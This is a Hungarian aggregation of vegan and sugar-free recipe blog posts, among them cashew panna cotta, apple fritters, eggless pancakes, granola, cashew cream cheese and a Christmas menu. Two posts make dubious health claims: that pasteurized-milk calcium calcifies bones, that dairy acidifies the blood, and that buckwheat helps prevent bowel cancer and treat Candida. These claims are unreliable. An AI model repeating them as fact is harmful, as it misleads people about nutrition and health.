csipet só 1 csipet őrölt vanília Konyhai aprítógépben gyorsan keverjük simára a kesukrémet, a vaníliát, az agave szirupot, az agar-agart, sót és 280 ml vizet. Öntsük át egy kis lábasba a keveréket és állandó keverés mellett főzzük kb. 20 mp-ig! Öntsük ki kis panna cotta formákba. Fedjük le a tetejüket sütőpapírral és tegyük 1 órára a fagyasztóba! Az öntet hozzávalóit mixerrel pürésítsük. Kés segítségével lazítsuk fel a panna cotta oldalát, tegyük tányérra, és öntsük le az eperszósszal! Forrás: Attila Hildmann: Vegan for Fit

Rendelhető aszalványok

2013. február 15. Gitta nyersétel blogja 

Rendelhető aszalványokViszonteladók jelentkezését várjuk, Budapesten vagy vidéken! Hamarosan itt a tavasz, méregtelenítés, fogyás, ideális időszak a nyers ételek fogyasztásának! A következő termékek várnak arra, hogy az ország különböző pontjain a legjobb bioboltok polcaira kerüljenek, és az ott lakók meg tudják vásárolni őket. Minden termékünk gluténmentes, cukormentes, szójamentes! Minden termékünk nyers, azaz hőkezelés nélkül készült, kizárólag természetes alapanyagokból. Gyümölcslapok: kiszerelés: 4, illetve 12 lap van egy csomagban. Most almalap van raktáron, de egyedi kívánságokat is teljesítünk. GyümölcslapokEzekből a lapokból különféle nyers édességeket tudtok készíteni: zserbót, palacsintát, flódnit... Édes aszalvány az áfonyás muffin, ami sokaknak kedvence, reggelire friss mandulatejjel igazi ínyencség... de csak úgy magában is nagyon jó étel. 10 dkg-os csomagban szállítjuk. áfonyás granolaKókuszos keksz egy nem túl édes, ropogós, finom ropogtatnivaló... Sós aszalványok, egészséges nassolnivalók: Zöldséges ropogós: (hagyományos leveszöldségek, hajdina, lenmag, aszalt paradicsom) Zöldséges ropogós Káposztás tökmagos keksz: (káposzta, napraforgó mag, tökmag, lenmag, fűszerek) Káposztás tökmagos keksz Az árak, a kedvezmények és a szállítás részleteit megbeszéljük egyénileg, írjatok nekem: gitta@nyersetelakademia.hu

Fahéjas Almás Fánk

2013. február 10. Fittanyuka Blog 

Fahéjas Almás Fánk Farsang idején elengedhetetlen a fánk. Sokat gondolkodtam, hogy mivel és hogyan tudnám kiváltani, mert a hagyományos fánk nem tartozik az egészséges ételek kategóriába..., sajnos. Az alábbi recept pedig egy kiváló alternatíva és a kalória tartalma messze nem annyi, mint a hagyományos testvérének. Én neveztem el fánknak, mert a kinézete megtévesztette a vendégeimet is:)). Utána sem volt csalódás, mert az íze is finom! Nem mellékesen ez az édesség élesztő, -tej, -tojás és cukormentes, alakbarát változat. Hozzávalók: 2-3 db alma 2-3 ek. friss citromlé 1-2 ek. fahéjas nyírfacukor 6 ek. világos tönkölyliszt víz csipet himalaya só 1-2 ek. szezámmag kókusz olaj a sütéshez Öntet: 200 ml kókusz tejszín 2-3 ek. agave szirup 1/­­2 kk őrölt fahéj Összekeverjük az összetevőket. Az almákat hámozzuk meg, a magházukat szúrjuk ki, majd vágjuk őket kb. 1 - 1,5 cm vastag szeletekre. Azonnal csepegtessünk rá citromlevet. Ezután szórjuk meg a fahéjas nyírfacukorral, és hagyjuk állni 5-6 percig. A tésztához keverjük össze a lisztet a vízzel, annyi vizet adjunk hozzá, amíg palacsinta tészta sűrűségű masszát kapunk. Majd keverjük hozzá a szezámmagot. Forrósítsunk bőséges mennyiségű kókusz olajat egy tapadásmentes edényben. Tipp: Az almaszeleteket világos tönkölylisztben megforgattam mielőtt belemártottam volna a palacsinta tésztába. Tehát belemártjuk a palacsinta tésztába őket egyenként és kisütjük a forró kókusz olajban. Miután aranybarnára sült mindkét oldaluk, konyha törlőkendőre szedjük. Az öntettel meglocsolva még melegen tálaljuk! Fittanyuka

Palacsinta tojás nélkül

2013. február 7. BioBrigi 

Palacsinta tojás nélkülMostanában csak ebédre vágyom sós ízvilágú ételre, reggel és este inkább a gyümölcsök csábítanak, ahhoz kell kitalálnom valamit. Legfőképp a banán az, amit szívesen eszek, pedig az első két harmadban egyáltalán nem kellett. Akkor mindig az idénygyümölcsök. Ha az épp a dinnye volt, akkor az, ha a barack, az, ha a szőlő, akkor az. Például a behozott szép nagy almák sem, viszont ahogy elkezdett érni a környéken a gubics savanykás alma, az nagyon jól esett. De hogy a palacsintára is rátérjünk, nem volt zablisztem, hogy a szokásos vegán recept szerint készítsem el, tojást meg ettem előtte valamiben. Ha tojással és szódavízzel működik a palacsintatészta, akkor tojás nélkül tejjel is kell neki, gondoltam, és valóban. Egészen finom lett, főleg, mikor rákentem a buktához használt Carobellából és a cukormentes eperdzsememből. Jól kiegészítették egymást. Hozzávalók: 25-30 dkg liszt (fele teljes kiőrlésű) 4 dl szénsavas ásványvíz 1/­­2 l szójatej 20 csepp sztívia, vagy 2 ek nyírfacukor 2 ek olivaolaj 1 ek lenmag só Botmixerrel az összes hozzávalót összeturmixoljuk. A liszt minőségétől függően, és hogy mennyire szeretünk vékony tésztát sütni, adhatunk még hozzá ásványvizet. Legalább egy negyed órát hagyjuk állni, és azután süssük. Nyers gyümölcsökkel (pl. reszelt alma, dió, kiwi), lekvárral, kölestúróval, ízlés szerint fogyasszátok.

Banános szójajoghurt

2013. február 3. Mindennapi ételeink 

Banános szójajoghurt Egy nagyon finom házilag elkészített joghurtreceptet hoztam, amely laktóz-és cukormentes. :-) Önmagában is nagyon finom, de müzlivel teljes értékű reggeli.  Hozzávalók - 2 személynek  5 dl Alpro natúr szójajoghurt 5 közepes, kevésbé érett banán 5 dkg nyírfacukor 1 citrom héja 1 tk. vaníliapor Elkészítés: A joghurtot egy magas falú tálba tesszük, hozzákockázzuk a meghámozott banánt, a nyírfacukrot, a citromhéjat és a vaníliát. Botmixerrel összeturmixoljuk.

Vegán diós csokoládés keksz szendvics

2013. január 18. Zizi kalandjai 

Vegán diós csokoládés keksz szendvics Mindig gondolkozom azon, hogy a címbe kitegyem-e a vegán szót, ha egy vegán receptet osztok meg. Úgy gondolom ez a szó még mindig sokakat elriaszt attól, hogy belevágjanak a sütésbe vagy főzésbe, mert azt gondolják, hogy ez valami ufo dolog és biztos olyan alapanyagok kellenek hozzá, amit macerás beszerezni. Igen, vannak olyan receptek, amelyekhez több alapanyag kell, de én hajlandó vagyok utána járni és beszerzem, ha számomra fontos. De vannak olyan receptek is, amelyeknek a hozzávalói nem igényelnek nagyobb utánajárást, sőt, lehet, hogy éppen mindenünk megvan hozzá a hűtőben és a kamrában. Persze lehet, hogy a kókuszzsír valakinek különleges dolog, nekem viszont már mindennapos élelmiszer. Ezen elmélkedve úgy döntöttem, hogy írni fogok egy bejegyzést arról, hogy melyek azok az alapvető élelmiszerek, amelyek az én vegetáriánus konyhámban/­­kamrámban megtalálhatók, hogy mindig legyen esélyem egy gyors vega vacsora összedobására, ha éppen kevés az idő. No, de most térjünk át ezekre a falatnyi finomságokra. Karácsonyra készültek és hatalmas sikerük volt. Kevés benne a cukor, teljeskiörlésű tönkölyliszt, valamint dió adja a tészta alapját egy csipetnyi fahéjjal és vaníliával fűszerezve. Lehet fogyasztani úgy is, hogy csak egy kekszre kenünk a csokoládé krémből, de össze is ragaszthatunk két kekszet a krémmel. Apró, hamm, bekaplak falatok! Gyorsan el fognak fogyni! Vegán diós csokoládés keksz szendvics Hozzávalók: Kekszhez : - 1 bögre teljeskiörlésű tönkölyliszt - 3/­­4 bögre dió, darálva - 2 teáskanál fahéj - 1 teáskanál só - 1 teáskanál sütőpor - 1 vaníliarúd kikapart magjai - 1/­­3 bögre nádcukor - 1 teáskanál almaecet - 1/­­4 bögre mandula/­­rizs/­­zab/­­szójatej - 1/­­3 bögre kókuszzsír, folyékony állapotban - 1/­­2 teáskanál mandula aroma (opcionális) Csokikrémhez : - 3/­­4 bögre 70%-os csokoládé - 2 evőkanál mandula/­­rizs/­­zab/­­szójatej - 1/­­4 bögre kókuszzsír - csipet só (A recepthez használt bögre 250 ml-es.) Egy tálban keverjük össze a keksz száraz hozzávalóit: liszt, dió, fahéj, só, sütőpor. Egy másik tálban keverjük össze a nedves hozzávalókat: nádcukor, almaecet, mandulatej, kókuszzsír, mandula aroma. Öntsük a nedves hozzávalókat a szárazhoz, jól keverjük el a tésztát, formázzunk labdát belőle, csomagoljuk folpackba és tegyük a hűtőbe 15-20 percre. Közben melegítsük elő a sütőt 180C fokra és tegyünk sütőpapírt egy tepsire. A hűtött tésztából csípjünk le egy kis darabot, formázzunk kis golyót (pingpong labdánál kisebbet) belőle, tegyük a sütőpapírral bélelt tepsire és lapítsuk le a tenyerünkkel. A maradék tésztával is járjunk el így (nekem 36 db keksz jött ki ebből a menyiségből). Süssük kb. 15 percig, amíg aranybarnák lesznek. Tegyük a krém hozzávalóit egy lábasba és alacsony láng felett olvasszuk meg az összes hozzávalót, közben kevergessük. Öntsük a krémet egy dobozba és tegyük hűtőbe addig, amíg kenhető állapotú lesz. A kihűlt kekszekből kenjünk meg egy darabot a krémmel és ragasszunk hozzá egy másik kekszet. Teszteljük egyből, hogy adható-e a vendégeknek vagy a családtagoknak! :)

Karácsonyi menü 2012

2012. december 24. Fittanyuka Blog 

Karácsonyi menü 2012 Ígértem nektek az idei karácsonyi - ünnepi menü felhozatalt nálunk. A cél időhiány miatt a praktikusság és a gyorsan elkészíthetőség volt, természetesen az általam fontosnak tartott szempontok szerint. Idén kevesebb időm jutott új karácsonyi receptek megkomponálására ( azért van egy-kettő a tarsolyomban:), ezért korábbi receptjeimből válogatva alakítottam ki a menüt. Lesz mártogatható, kenhető krém: Mentás - chilis zöldborsó krém, amit akár akkor is elővehetek ha vendégek érkeznek és  pirítóssal, vagy a paprikás stanglival, zöldségekkel, tortilla lapokkal ideális vendégváró. De ideális lesz akkor is ha estére megéhezik a család. A saláta elmaradhatatlan: a fenyőmagos zeller saláta, dióval gazdagítva igazi téli saláta, vitaminban és enzimekben gazdag csírákkal, hogy ne feledkezzünk meg a klorofillről és a lúgosító zöldségekről sem! A falafel fasírt szintén hidegen, melegen egyaránt finom, ugyancsak ideális ha vendégek érkeznek. A polentával töltött sült gombát és a grillezett szejtáncsíkokat almás - zeller pürével, spenóttal főételnek szántam ebédre karácsony első és másodnapján, a vegán töltött káposztát erdélyiesen pedig szentestére. Idén elmarad  a leves.  A krokett pedig bármelyik főétel kísérője lehet, vagy önmagában is fogyaszthatjuk salátával. A kakukk tojás a tavaszi tekercs amely zöldségekkel van megtöltve, arra az esetre szánom ha végképp nem elégszik meg a család az előbbi felsorolással. A desszertek pedig a következőek lesznek: lesznek sült és lesznek nyers desszertek is. Elmaradhatatlan nálunk a diós és mákos bejgli vagy bejgli torta ( tej,-tojás,-cukor,-élesztő nélkül), továbbá tavaly hagyományt teremtett egy másik nyers, bonbon édesség a zserbó golyó. Nemrég megosztott posztban pedig a házi és szintén nyers, narancsos marcipán - szaloncukorból is teszek ki majd egy bonbonos tányérra, csomagolás nélkül. Hamarosan elindítom a Süti - Nem süti  menü címkét amelyben ezzel a Szedres - csokoládé  nyers tortával fogok indítani, amely nagy sikert aratott a napokban nálunk. A két ünnep között biztosan elkészítem újra és megosztom veletek a receptet:)! A mozart kuglóf kandírozott narancshéjjal ( cukormentes), pedig a webcukrászdám egyik legkedveltebb  süteménye karácsonykor. Egy ilyen koszorút megmentettem magunknak is az ünnepekre. Lehet azt gondoljátok, hogy kicsit sok és talán kaotikus a felhozatal, de ezek szinte mind olyan ételek, amelyeket ha előre elkészítünk arra a pár napra biztosan elállnak és mi pihenhetünk, lazíthatunk.  Én most kevesebb időt próbálok a konyhában tölteni és inkább a családdal, barátokkal szeretnék feltöltődni, ezért van kissé büfé jellege az idei menünek. Kíváncsi lennék a ti karácsonyi menütökre is, ha van egy kis időtök osszátok meg velünk, mert mindig tanul az ember:) Addig is stresszmentes készülődést kívánok! Fittanyuka

téli fagyi remake ala orange

2012. december 19. VegaLife 

téli fagyi remake ala orangeHolnap a férjem munkahelyén karácsonyi "party" lesz. Mindenkinek ki lett adva, hogy süteményt hozzon. Egy rövid időre elhúztam ezen a szám, s először azt gondoltam, úgysem lesz időm sütni, majd veszünk valamit. Aztán kiderült, hogy mégis lesz időm sütit készíteni. S az agytekervényeim be is indultak. "Á, készítek valami egyszerű dolgot leveles tésztából". "Zabpehelyből fogok golyókat gyártani". "Egy rétes is gyorsan elkészül". Szóval valami gyorsat terveztem. Csakhogy megláttam a hosszú ideje ott árválkodó ostyalapokat a polcon. Most már jó lenne eltüntetni őket. S amikor mellettük döntöttem, azt gondoltam, ó, ez tényleg gyors lesz. Hát nem. Nem gyors, de ennél bonyolultabb és hosszabb ideig tartó, macerás sütik is léteznek. S persze le kell szögeznem, hogy mindenevő társaságnak lesz, így gondoltam, felhagyok a "reform"sütemény készítésével. Azért csak nem erőltethetem rájuk egészségmániás termékeimet. Végül is még csak nem is családtagok, és egy karácsonyi partin szerintem egészségtelenebb dolgok is vannak, mint kakaó és csokoládé. Szóval általunk már egyre inkább mellőzött utóbbi két termék által is állítottam elő ezeket a gyönyörűségeket. Remélem ízleni fog nekik. UI: remake =  Egy korábban készített (általában sikeres) film, televíziós filmsorozat, illetve egyéb termék (videojáték, képregény, esetleg regény) felújított változata (Idegen Szavak Gyűjteménye) Remake jelen esetben a téli fagyit jelenti. Bizonyára sokan emlékeznek arra a tölcséres - kakaós krémmel töltött, csokiba mártott nyalánkságra. Néhol még látni "retro"-édességként a boltok polcain. Igazából nem voltam nagyon oda érte sosem, de a lehetőség, hogy valami csinosat, dekoratívat alkotok, azonnal felvillanyozott... A recept: Hozzávalók: - 1 csomag ostyalap (6 lap volt az enyémben) 30 dkg zabpehely 2 maroknyi mogyoró (kb. 10-15 dkg) 1 maroknyi aszalt gyümölcs 2 narancs reszelt héja gabonakávé kakaópor cukor"féleség" (gyümölcscukor, nyírfacukor, stevia, stb., de sima vagy barna cukor is jó) víz konyharuha 4 db ruhacsipesz étcsoki (tortabevonó) olaj Remélem, semmit nem hagytam ki. :) Elkészítés: A zabpelyhet megpirítjuk, majd megőröljük. (Nem kell liszt-szerűre, jobb, ha durvább.) A mogyorót durvára daráljuk (aprítjuk). FELÉT a zabpehelyhez adjuk. Az aszalt gyümölcsöket késsel, vagy aprítógéppel szintén felaprítjuk. Nekem házi aszalt almám és körtém volt. Kicsit nehezebben kezdetben, de végül jól vitte a gépem. Az összetört gyümölcsöket szintén hozzáadjuk a zabpehely és mogyoró együtteséhez. Majd szórunk bele kakaót (cukormenteset), édesítőszert (gyümölcs-, vagy nyírfacukor, stb.) és belereszeljük a két narancs héját. A száraz hozzávalókat összekeverjük, majd ráöntjük a gabonakávét. Nekem olyan gabonakávém van, amit le kell forrázni, majd átszűrni, így az átszűrést már eleve a száraz hozzávalókra végeztem el. Nagyjából 4-5 dl kávé kerülhetett a masszába. Ezt követően alaposan átkeverjük. Olyan állagúnak kell lennie, mint a darált-keksz alapú kókuszgolyó, vagy keksztekercsnek. (Zabpehely helyett dolgozhatunk darált keksszel is, de szerintem egészségesebb - nekem finomabb is a pirított zabpehely.) Amikor mindezzel kész vagyunk és összeállt a massza, elkészítjük a tölcséreket. Fogunk egy széles karimájú alacsony edényt, és kb. 3/­­4 részig megtöltjük vízzel. Felforraljuk. Amikor forr, őrlángra, vagy legkisebb fokozatú villanyra vesszük. Egy konyharuhát kettéhajtunk és négy db ruhacsipesszel az edény tetejére rögzítjük a ruhát. Az ostyalapokat felvágjuk háromszög alakúakra. Először csak az egyik lapot, mert lesz időnk arra, hogy az egészet felvágjuk. A konyharuha tetejére fektetjük a háromszögeket és a felfelé áramló gőzzel megpuhítjuk. Érdemes ügyelni arra, hogy ne puhuljon túlzottan meg, mert annál nehezebben fog megszikkadni. A megpuhult háromszögeket egymásra hajtjuk úgy, hogy egy tölcsért kapjunk. A tölcsér alját összeszorítjuk, a két végét, amit egymásra hajtottunk, egymásra nyomkodjuk. Ha szükséges, használhatunk hozzá fakanalat. Azok, akik kevésbé merészek, vagy csekélyebb kézügyességgel rendelkeznek, próbálják ki először papírral. Egy post-itből vagy jegyzetlapból már lehet olyan háromszöget kivágni, ami legalább egyenlő szárú. (Nekem erre nem volt szükségem.) A kész "tölcséreket" egy tányérra tesszük, mire az összeset felvágjuk, meggőzöljük, összehajtjuk, addigra szép lassan visszakeményednek - de már tölcsér formában. Attól függően, hogy egy lapból hány háromszöget vágunk ki - több, vagy kevesebb; nagyobb vagy kisebb tölcséreink lesznek. Amikor kész az összes tölcsér, egyszerűen csak megtöltjük őket a korábban elkészített masszával. Én teáskanál másik végével adagoltam bele a tésztát. Miután mindet megtöltöttük, kb. 70 gramm étcsokit vagy tortabevonót megolvasztunk, hozzákeverünk két-három evőkanál olajat és a tölcsérek szélesebb végét belemártjuk. Ezt követően vagy belemártjuk az aprított mogyoró másik felébe, vagy egyszerűen csak megszórjuk a csokis részt mogyoróval. Hűtőben egy-két óra alatt megdermed és már fogyasztható is. Még egy titkot elárulok ezzel kapcsolatban. Ha nem akarunk a tölcsérekkel "macerázni", egyszerűen golyókat is formázhatunk a masszából. Frenetikusan finom - egyfajta karácsonyi íze lett a narancstól. A golyókat megtölthetjük mandarin vagy narancsdarabokkal. (Én a mandarint választottam.) Ha azonnal kókuszba vagy aprított mogyoróba hempergetjük, akkor felveszik a külsejükre, máskülönben csokiba mártva szintén díszíthetjük még kókusszal vagy mogyoróval. Mivel a tésztából maradt még némi, a maradékból ilyen gömböcskéket formáltam. Csak nehogy Gombóc Artúr az éjszaka meglátogasson! :))) Jó hír: kakaó helyett karobbal is elkészíthető. - Igazi reformosoknak inkább azt a verziót ajánlom.

Szuper reggeli: Sütőtökös fűszeres granola

2012. december 3. Zizi kalandjai 

Szuper reggeli: Sütőtökös fűszeres granola Pénteken ezzel a dallal hangolódtam rá a karácsonyra, na meg a lakásban terjengő fahéj, csokoládé, mandula és dió illattal. Helló december! Üdv a körünkben! Ennek megfelelően egy olyan receptet hoztam, ami kiváló ködös, hideg decemberi reggelekre. A szuper reggeli kategóriába soroltam, de ötletes gasztro ajándék is lehet (nálam lesz is! :) - guszta üvegbe téve, ízlésesen becsomagolva, garantált a siker), amit karácsony reggelén együtt fogyaszthatunk el a családdal. Csupa tápláló alapanyag van benne, amelyek ízlés szerint variálhatók.  A granola alapját a zabpehely, olajos magvak és valamilyen édesítőszer képezik, adhatunk hozzá aszalt gyümölcsöket,  jó minőségű csokoládét, megszórhatjuk kakaóval vagy kókuszreszelékkel... szóval rengeteg variánsa van. Egy korábbi cukormentes granola receptet itt találtok. Mindenkinek jó készülődést kívánok az ünnepekre! Sütőtökös fűszeres granola Hozzávalók: - 2 bögre zabpehely - 1/­­3 bögre sütőtökpüré - 1/­­2 bögre dió - 1/­­4 bögre juharszirup (méz, rizs- vagy agavészirup is használható) - 3 evőkanál szezámmag - 2 és 1/­­2 evőkanál kókuszolaj - 1 teáskanál fahéj - 1/­­8 teáskanál őrölt szerecsendió - 1/­­8 teáskanál őrölt szegfűszeg - 1/­­2 teáskanál só - 1/­­4 bögre aszalt vörösáfonya (A recepthez használt bögre 250 ml-es.) A sütőt melegítsük elő 160 fokra. Egy tálban keverjük össze a zabpelyhet, a diót, a szezámmagot, a fahéjat, a szerecsendiót, a szegfűszeget és a sót. Egy másik tálban keverjük el a sütőtökpürét a kókuszolajjal és juharsziruppal. Ezt a keveréket adjuk a zabpehelyhez és jól dolgozzuk el. Öntsük a nedves granolát egy sütőpapírral bélelt tepsire és süssük 30-40 percig, amíg a magok aranybarnára pirulnak. Félidőben egy kanállal keverjük át, hogy egyenletesen megsüljön. Öntsük üvegekbe, csomagoljuk és már kész is az ajándékunk.

Szuper reggeli: Sütőtökös zabkása pirított dióval

2012. november 6. Zizi kalandjai 

Szuper reggeli: Sütőtökös zabkása pirított dióval Emlékeztek a szuper reggelikre? Tavaly februárban indult, amikor I.-vel cukormentes hónapot tartottunk. Most, hogy újra itt a hideg időszak, érzem, hogy már csak gyümölcs nem elég reggelire. Valami táplálóbbra, gazdagabbra van szüksége a szervezetünknek, amely melegít és energiával tölt fel. Ezért folytatódni fog a szuper reggeli sorozat és jövök jobbnál-jobb receptekkel, amelyek többnyire vegánok!  A zabkását (angolul porridge) még Angliában szerettem meg, amikor ott éltem és egy étteremben dolgoztam. Egyszer egy vendég ezt kérte reggelire. Megkérdeztem tőle, hogy mi ez. Aztán beszaladtam a konyhába és elkészítettem életem első zabkásáját úgy, hogy magamnak is hagytam egy keveset. A reggel sikerrel zárult. A vendég elégedetten távozott, én pedig jóllakottan végeztem tovább a munkám. A zabkása igen laktató és egészséges reggeli, tele jó sok rosttal. Én mindig növényi tejjel (mandula-, zab- vagy rizstej) készítem, mert ezek édesebb ízűek, mint a tehéntej, így néha kibírom, hogy nem adok hozzá semmilyen édesítőszert, csak szárított gyümölccsel és pirított magvakkal eszem. Most viszont adtam hozzá egy kis juharszirupot, amelynek a karamelles íze kiváló párost alkot a sütőtökkel és a dióval. Igazi őszi harmónia ízben és színben egyaránt egy kis tálkában. Hát lehet ennek ellenállni? Tipp: süssük meg a tököt péntek este, így hétvégén rengeteg finomságot alkothatunk a konyhában, anélkül, hogy időt töltenénk a csodás narancssárga tök megsütésével. Sütőtökös zabkása pirított dióval Hozzávalók 2 főre: - 60 g zabpehely - 110 g sütőtök püré - 350 ml zabtej - 2-3 evőkanál juharszirup (méz, agavé- vagy rizsszirup is használható) - 1/­­2 teáskanál fahéj - csipet szerecsendió - csipet őrölt szegfűszeg - egy kis maréknyi dió Egy száraz serpenyőben 6-8 perc alatt pirítsuk meg a diót és tegyük félre. Egy kis lábasban közepes láng felett kezdjük el főzni (állandó keverés mellett) a zabpelyhet a zabtejjel. Amikor kezd besűrűsödni hozzáadjuk a sütőtök pürét, a juharszirupot és a fűszereket. Ha túl sűrűnek találjuk adjunk még hozzá egy kevés tejet, jól keverjük el és tálaljuk azonnal. Szórjuk meg pirított dióval.

Hajdinalisztes palacsinta citromkrémmel

2012. szeptember 7. Fittanyuka Blog 

Hajdinalisztes palacsinta citromkrémmel   A hajdina (más néven pohánka, tatárka) jótékonyan hat az érrendszeri megbetegedéseknél, a magas vérnyomásban szenvedőknél és a cukorbetegeknél. Kiemelkedően magas élelmirost-tartalma miatt a bélperisztaltika növelésén és a tranzitidő lerövidítésén keresztül jól alkalmazható a népbetegségnek tekinthető székrekedés (obstipatio) étrendi kezelésében és egyes daganatos megbetegedések (például vastag- és végbéldaganat) megelőzésében. A hajdina alkalmazható a Candida albicans fertőzés étrendi kezelésében is. A belőle készült lisztből készíthetünk palacsintát, próbáltam más jellegű süteményeknél is, de jellegzetes íze miatt ( ami egyébként nem rossz ízt jelent), nem aratot nagy sikert. A palacsinta a kellemesen savanykásan - édes citromkrémmel nagyon finom ízhatású.  Próbálhatjuk más krémekkel is, vagy cukormentes lekvárokkal. Hozzávalók:   200 g hajdina liszt 200 g világos tönkölyliszt 1 l víz 3 evőkanál kókusz olaj késhegynyi szódabikarbóna   kókusz olaj a sütéshez.   A fenti összetevőkből palacsinta tésztát keverünk és kókusz olajjal kikent palacsinta sütőn egyenként kisütjük.   Citromkrém:   400 ml kókusztejszín 3 evőkanál keményítő 2 evőkanál nyírfacukor 1/­­2 citrom leve 1/­­2 citrom reszelt héja pár csepp citrom olaj   A kókusztejszínt összekeverjük a vízzel, csomómentesen elkeverjük a keményítővel, hozzáadjuk a citrom levet, héját és olajat. Lassú tűzön, állandó keverés mellett addig főzzük ameddig besűrűsödik. A krémhez adhatunk cukormentes (kukoricasziruppal), kandírozott citromhéjjat, vagy aranymazsolát. Hagyjuk kihűlni, majd hidegen mégegyszer átkeverjük és igényt szerint töltjük vele a palacsintáinkat. Fittanyuka

Banánkenyér (glutén-, tej- és cukormentes)

2012. augusztus 23. Rongybaba konyha 

Banánkenyér (glutén-, tej- és cukormentes) Ideális GM reggeli. Nekünk úgy ízlik a legjobban, ha áll egy napot sütés után. 2 banán 2 tojás 170 g őrölt mandula 50 g teff liszt 70 g felolvasztott kókuszzsír fél kk sütőpor (fahéj, vanília) Összeturmixolom a tojást, babánt, kókuszzsírt hozzákeverem a száraz összetevőket és előmelegített 175 fokos sütőben kiolajozott formában kb fél óra alatt készresütöm.

Grillezett padlizsán - Kukoricás szezámkrémmel

2012. július 17. Fittanyuka Blog 

Grillezett padlizsán - Kukoricás szezámkrémmel A nyár egyik nagy előnye, hogy ha módunkban áll kedvünkre sütögethetünk, grillezhetünk a szabadban. A zöldségek kavalkádja bőséges variációt kínál akár a grillezéshez is. Nagyszerű választás a padlizsán, gomba, cukkini, paprika, paradicsom (félbe vágva), lila hagyma és a sort még folytathatnám. Azoknak akik húst is fogyasztanak legyen az a szabály érvényben, hogy nem a sült, grillezett húshoz adják a kevesebb zöldség köretet, hanem zöldségekhez adnak egy kevés húst, így könnyen megelőzhetik a savasodást ( egy részről), vagy segíthetnek szervezetüknek a pH egyensúly visszaállításában. Ha pedig csak a zöldségek mellett voksoltok akkor adhattok hozzá isteni krémeket , vagy kifejezetten olyat mint az alábbi recept. Nagy előnye a szezámmagnak, hogy rendkívül magas a szerves  kálcium tartalma, több van benne, mint bármelyik terjermékben. Tipp:   Pasztörizált tejben szervetlen formában van a kálcium és így nem beépül, hanem ráépül a csontokra: meszesedés formájában. Továbbá a tejtermékek erősen savasítanak , ezért a szervezet kálciumot von el magától, hogy semlegesítse és tartsa a vér kritikus pH értékét!). Én grillezés , sütés előtt előre befűszerezem a zöldség ( padlizsán, cukkini) korongokat: himalaya sóval, zöld borssal, vagy az egyik legjobb választás az élesztőmentes vegantéria - vegamix. Pihentetem fél órát, utána a felesleges vizet papír törlő segítségével leitatom. A padlizsánnál tapasztalható, hogy ha nem grillezőn hanem kerámia edényben sütjük, minden olajat zsíradékot magába szív. Ezen úgy segíthetünk, hogy sütés előtt meglocsoljuk kókusz vagy hidegen sajtolt olíva olajjal. Mindkét oldalukat pirosra, aranybarnára sütjük. Kukoricás Szezámkrém Hozzávalók: 250 g szezámmag vagy szezám pehely 200 ml kókusz tejszín 2-3 evőkanál hidegen sajtolt lenmag olaj 1 kk himalaya só 1 dl víz 1/­­2 citrom leve 2 cikk préselt fokhagyma 150 g cukormentes konzerv csemege kukorica vagy friss, főtt. A szezámmag felét enyhén, állandó keverés mellett megpirítjuk, így egy jellegzetes ízt adunk a krémnek. A másik felével együtt megdaráljuk, majd a többi hozzávalóval, kivéve a kukoricát, együtt krémesre turmixoljuk. A kukorica szemeket utólag hozzákeverjük a krémhez. Tetejét tálaláskor lenmag olajjal meglocsoljuk. Fittanyuka

Diós almatorta

2012. május 16. Govinda Vegetáriánus konyhája 

gluténmentes, cukormentes, tejtermékmentes, mégis finom

Kesudió krémsajt + a harmadik hét cukor nélkül

2012. február 25. Zizi kalandjai 

Kesudió krémsajt + a harmadik hét cukor nélkül A kihívás harmadik hete jól telt, néha vágyakoztunk édesség után, de azért tudtuk tartani magunkat. I. maradt vegetáriánus, én azonban a cukormentesség mellé bevállaltam a vegán étkezést is. Vegetáriánusból vegánba átlépni nem nehéz, csak arra kellett figyelnem, hogy ha veszek valamit, akkor alaposan elolvassam az összetevőket, hogy nincs-e benne állati eredetű élelmiszer. Igen, ennyire keményen tartom a diétát, igyekszem odafigyelni ezekre az apróságokra is. Bevallom még a növényi sajtra is rávetemedtem... vegán barátaim javasolták, hogy próbáljak ki egy görög fajtát, ami állítólag (végre) jó ízű is, magában is fogyasztható és jól lehet reszelni is. A natúr ízű Viofast sajtot próbáltam ki. Ízre tényleg OK (magában és ételekre reszelve, olvasztva is), ami egy kicsit zavart, az az összetevőkben lévő E1450, E1404 és E452. Utánanéztem, hogy mit is ettem pontosan. Az E1450 keményítő-nátrium-oktenil-szukcinát (ajaj!), ami állítólag veszélytelen; bekerül a szénhidrát anyagcserénkbe. Az E1404 oxidált keményítő, szintén ugyanaz vonatkozik rá, mint az E1450-re. Az E452 pedig egy polifoszfát fajta, szintén veszélytelennek számít és ömlesztett sajtok (+ készítményei), húskészítmények, desszertek és fagylalt készítéséhez is felhasználják. (Köszönet az infókért a Tudatos Vásárlónak.) Szinte hihetetlen, hogy ezekből az anyagokból sajtok és egyéb élelmiszerek készülnek. Nincs benne tej (tehén- vagy kecsketej), mégis sajtnak van eladva és sajtként fogyasztja az ember... Elgondolkodtató! A fotón látható krémsajt azonban csak természetes anyagokból készült. Felhasználhatjuk szendvicsek készítéséhez vagy kenhetjük pirított kenyérkockákra, krékerre, de akár zöldségeket - répát, paprikát, uborkát, stb. - is mártogathatunk bele. Gyorsan készen van, a kesudió áztatását leszámítva, csak egy erős aprítógépre van szükségünk az elkészítéséhez. A recept megint Maria-tól származik, akinek a blogja sokat segít a cukormentes hónap alatt. Rengeteg vegán, cukormentes receptje van és inspiráló bejegyzései, amelyek tartják bennem a lelket! :) Kesudió krémsajt Hozzávalók: - 250 g kesudió, beáztatva egy éjszakára, majd lecsöpögtetve - 100 ml rizstej (zabtej, szójatej is használható helyette) - 1 db citrom reszelt héja - 1/­­2 citrom kifacsart leve - 1 teáskanál köménymag, száraz serpenyőben 4-5 perc alatt megpirítva - 1-2 teáskanál só - bors Tegyük az összes hozzávalót az aprítógépbe és aprítsuk addig, amíg sima, krémes, kenhető állagú lesz. Kóstoljuk meg és ízlés szerint adjunk még hozzá citromlevet, sót, borsot, ha szükséges. További cukormentes vegán receptekért katt ide.

Tavaszi tekercs citrusos szójaszósszal + a második hét cukor nélkül

2012. február 19. Zizi kalandjai 

